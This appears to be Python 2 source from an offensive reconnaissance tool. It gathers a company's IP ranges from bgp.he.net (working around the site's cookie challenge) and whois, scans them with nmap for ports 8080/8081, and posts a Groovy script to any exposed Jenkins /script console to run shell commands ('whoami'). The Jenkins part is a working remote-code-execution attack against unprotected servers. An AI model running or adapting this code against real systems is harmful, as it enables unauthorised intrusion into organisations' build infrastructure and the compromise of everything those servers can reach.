class FindJenkins(object): def __init__(self): super(FindJenkins, self).__init__() self.globalVariables=GlobalVariables() self.session = requests.Session() def GetUser(self,IP,PORT,FILE,CRUMB): URL = "http://"+IP+":"+PORT+""+FILE+"" paramsPost = {"Jenkins-Crumb":""+CRUMB+"","json":"{\"script\": \"println new ProcessBuilder(\\\"sh\\\",\\\"-c\\\",\\\"whoami\\\").redirectErrorStream(true).start().text\", \"\": \"\\\"\", \"Jenkins-Crumb\": \"4aa6395666702e283f9f3727c4a6df12\"}","Submit":"Run","script":"println new ProcessBuilder(\"sh\",\"-c\",\"whoami\").redirectErrorStream(true).start().text"} headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0","Connection":"close","Accept-Language":"en-GB,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":URL,"Content-Type":"application/x-www-form-urlencoded"} response = self.session.post(URL, data=paramsPost, headers=headers, timeout=15, verify=False) result = response.text user = re.compile('<h2>Result</h2><pre>(.+?)\n').findall(response.text)[0] return user def TestJenkins(self, IP,PORT): FILE="/script" URL = "http://"+IP+":"+PORT+""+FILE+"" headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Upgrade-Insecure-Requests":"1"} response = self.session.get(URL, headers=headers, timeout=15, verify=False) if "Jenkins" in response.text: print "found" if 'Jenkins-Crumb' in response.text: CRUMB = re.compile('Jenkins-Crumb", "(.+?)"').findall(response.text)[0] GetUser(IP,PORT,FILE,CRUMB) else: GetUser(IP,PORT,FILE,"") else: print "Not Found" def EnumerateIPToFindJenkins(self, domain): outUpIP="{}{}/{}".format(self.globalVariables.outputDir, domain, "upIP.txt") outUpIPWithPort="{}{}/{}".format(self.globalVariables.outputDir, domain, "upIPWithPort.txt") outIPv4Ranges="{}{}/{}".format(self.globalVariables.outputDir, domain, "ipv4ranges.txt") self.globalVariables.CommandExecutor("nmap -sP -iL {} | grep -E -o '([0-9]{{1,3}}[\\.]){{3}}[0-9]{{1,3}}' > {}".format(outIPv4Ranges, outUpIP)) self.globalVariables.CommandExecutor("nmap -p8080,8081 -iL {} | grep -E -o '([0-9]{{1,3}}[\\.]){{3}}[0-9]{{1,3}}' | sort | uniq > {}".format(outUpIP, outUpIPWithPort)) #self.outIPv6Ranges="{}{}/{}".format(self.globalVariables.outputDir, domain, "ipv6ranges.txt") upHostFile = open(outUpIPWithPort, "r") for host in upHostFile: try: self.TestJenkins(host.strip(), '8080') except: print host.strip() + ": Not find" try: self.TestJenkins(host.strip(), '8081') except: print host.strip() + ": Not find"
class CollectIPSpaces(object): """docstring for CollectIPSpaces""" def __init__(self): super(CollectIPSpaces, self).__init__() self.globalVariables = GlobalVariables() def get_path_cookie_digest(self): result = '' headerVal = '' requetURL = "https://bgp.he.net/search?search%5Bsearch%5D=google&commit=Search" response = requests.head(requetURL, headers=self.globalVariables.bgp_headers, timeout=10) for header in (response.headers['Set-Cookie']).split(" "): if header.find("path=") == 0 and header.find("--") != -1: headerVal = header.split("=")[1] headerVal = headerVal.split(";")[0] decodedHeaderVal = urllib.unquote(headerVal) result = hashlib.md5(decodedHeaderVal.encode()) return headerVal, result.hexdigest() def get_external_ip_digest(self): externalIP = requests.get('http://ip.42.pl/raw').text result = hashlib.md5(externalIP.encode()) return result.hexdigest() def get_bgp_session_cookie(self): requetURL = "https://bgp.he.net/jc" sessionCookieHeaderVal = '' headerVal, cookieDigest = self.get_path_cookie_digest() response = requests.head(requetURL, data={ 'p': cookieDigest, 'i': self.get_external_ip_digest() }, cookies={'path': headerVal}, headers=self.globalVariables.bgp_headers, timeout=10) for header in (response.headers['Set-Cookie']).split(" "): if header.find("c=") == 0 and header.find("--") != -1: headerVal = header.split("=")[1] sessionCookieHeaderVal = headerVal.split(";")[0] return sessionCookieHeaderVal def bgp_he_net_ipspaces(self, companyName, domain): ipRanges = [] finalRanges = [] outBgpHeNet = "{}{}/{}".format(self.globalVariables.outputDir, domain, "bgp_he_net.txt") requetURL = "https://bgp.he.net/search?search%5Bsearch%5D={}&commit=Search".format( companyName) request = requests.get(requetURL, cookies={'c': self.get_bgp_session_cookie()}, headers=self.globalVariables.bgp_headers, timeout=10) soup = BeautifulSoup(request.text, "lxml") result = '' for column in soup.findAll("td"): try: data = column.find("a").string result += data + "\n" ipRanges.append(data) except: "exception raised" self.globalVariables.WriteTextToFile(outBgpHeNet, result) resultIPv4 = '' resultIPv6 = '' self.outIPv4Ranges = "{}{}/{}".format(self.globalVariables.outputDir, domain, "ipv4ranges.txt") self.outIPv6Ranges = "{}{}/{}".format(self.globalVariables.outputDir, domain, "ipv6ranges.txt") for ipRange in ipRanges: if ipRange.find("/") != -1: if ipRange.find(":") != -1: resultIPv6 += ipRange + "\n" else: resultIPv4 += ipRange + "\n" if ipRange not in finalRanges: finalRanges.append(ipRange) elif ipRange.find("AS") == 0: for data in self.whoisIPSpaces(ipRange[2:]): if data not in finalRanges: if data.find(":") != -1: resultIPv6 += data + "\n" else: resultIPv4 += data + "\n" finalRanges.append(data) self.globalVariables.WriteTextToFile(self.outIPv4Ranges, resultIPv4) self.globalVariables.WriteTextToFile(self.outIPv6Ranges, resultIPv6) return finalRanges def whoisIPSpaces(self, asnNumber): output = self.globalVariables.CommandExecutor( "whois -h whois.radb.net -- '-i origin {}' | grep -Eo '([0-9.]+){{4}}/[0-9]+' | sort -n | uniq -c | cut -d' ' -f8" .format(asnNumber)) return output.splitlines() def GetAllIPSpaces(self, companyName, domain): return self.bgp_he_net_ipspaces(companyName, domain) #add ARIN & RIPE Processing #whois.arin.net/ui/Query.do #apps.db.ripe.net/db-web-ui